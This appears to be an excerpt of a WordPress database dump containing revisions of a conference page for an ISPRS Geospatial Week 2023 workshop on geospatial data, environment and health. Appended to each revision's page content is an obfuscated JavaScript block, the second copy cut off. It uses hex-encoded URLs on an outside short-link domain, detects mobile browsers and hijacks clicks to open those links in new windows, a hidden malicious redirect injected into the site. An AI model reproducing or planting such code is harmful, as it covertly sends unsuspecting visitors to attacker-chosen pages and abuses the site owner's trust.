tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-01-09 21:49:00','2023-01-09 21:49:00','',3066,'https://gsw2023.com/?p=3542',0,'revision','',0),
(3544,1,'2023-01-14 01:41:44','2023-01-14 01:41:44','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3446\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5>Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5><em> </em></h5>\n<h5><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5></h5>\n<h5><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of the Workshop</u></strong></h5>\n<table width=\"588\">\n<tbody>\n<tr>\n<td width=\"270\"><em><strong>Air pollution</strong></em></td>\n<td width=\"318\"><em><strong>Aerosols and AOD</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Air /water quality</strong></em></td>\n<td width=\"318\"><em><strong>Vegetation</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Disaster management</strong></em></td>\n<td width=\"318\"><em><strong>Land use changes and dynamics</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Land degradation</strong></em></td>\n<td width=\"318\"><em><strong>Epidemiology and Disease mapping</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>GeoAI and Health analytics</strong></em></td>\n<td width=\"318\"><em><strong>Geospatial applications to Environment</strong></em></td>\n</tr>\n</tbody>\n</table>\n<p><em>Research papers are invited with focus on application of <strong>Geospatial technogies including <u>Remote Sensing</u></strong> to the following  broad themes</em></p>\n<p>&nbsp;</p>\n<p>The main concern is related to methods of extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people.  <strong>Given below I to vi are the 6 grand challenges formulated so as to invite the potential  authors  to bring out their research results as a very specific outcome of the workshop to the maximum possible extent.  </strong></p>\n<ol>\n<li><em>Environment and health are dependent on geographical variations, So understanding how physical geography is influencing social geography</em> by using tools of geospatial technology is essential for effective management of environment. In general, we consider  remote sensing data due its variety, veracity, volume and velocity  is effective tool for addressing the unique challenges. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing. So this is one challenge thrown to potential authors to address in their presentation.</li>\n</ol>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<ol>\n<li>Next challenge to be addressed by authors is on explanation related tp how much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect the society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school.</li>\n</ol>\n<ul>\n<li>The third one is on how can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.</li>\n</ul>\n<ol>\n<li>What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?</li>\n<li>The fifth challenge is about Remote sensing application to assessment of air quality and air pollution, atmospheric aerosols, atmospheric composition, and evaluating its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes</li>\n<li>Disaster management is a great challenge and state-of-the-art Geospatial and GeoAI techniques application is emerging as a powerful tool. Here authors may address the challenges related to Geospatial Infrastructure Management Ecosystem (GeoIME), cloud-web-application including AI tools, early warning systems, monitoring, preparedness, data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images etc.</li>\n</ol>\n<h5><u>Supporting ISPRS Working Groups:</u></h5>\n<ul>\n<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\n<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management</li>\n</ul>\n<p>are the supporting working groups.</p>\n<h5><u>Scientific Committee:</u></h5>\n<ul>\n<li>Peng Yue, Wuhan University, PR China</li>\n<li><strong> Weilian Li, </strong>University of Bonn, Germany</li>\n<li>Dr Suchita Gopal, Boston University. USA</li>\n<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\n<li>Dr Fazlay Faruq, University of Mississippi USA</li>\n<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\n<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\n<li><strong>Dr Nelly Lucero Ramírez Serrato, </strong>National Autonomous University of Mexico, Mexico</li>\n<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\n</ul>\n<h5><u><strong>Special Issue dedicated to the workshop:</strong> </u></h5>\n<p>The authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a>.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 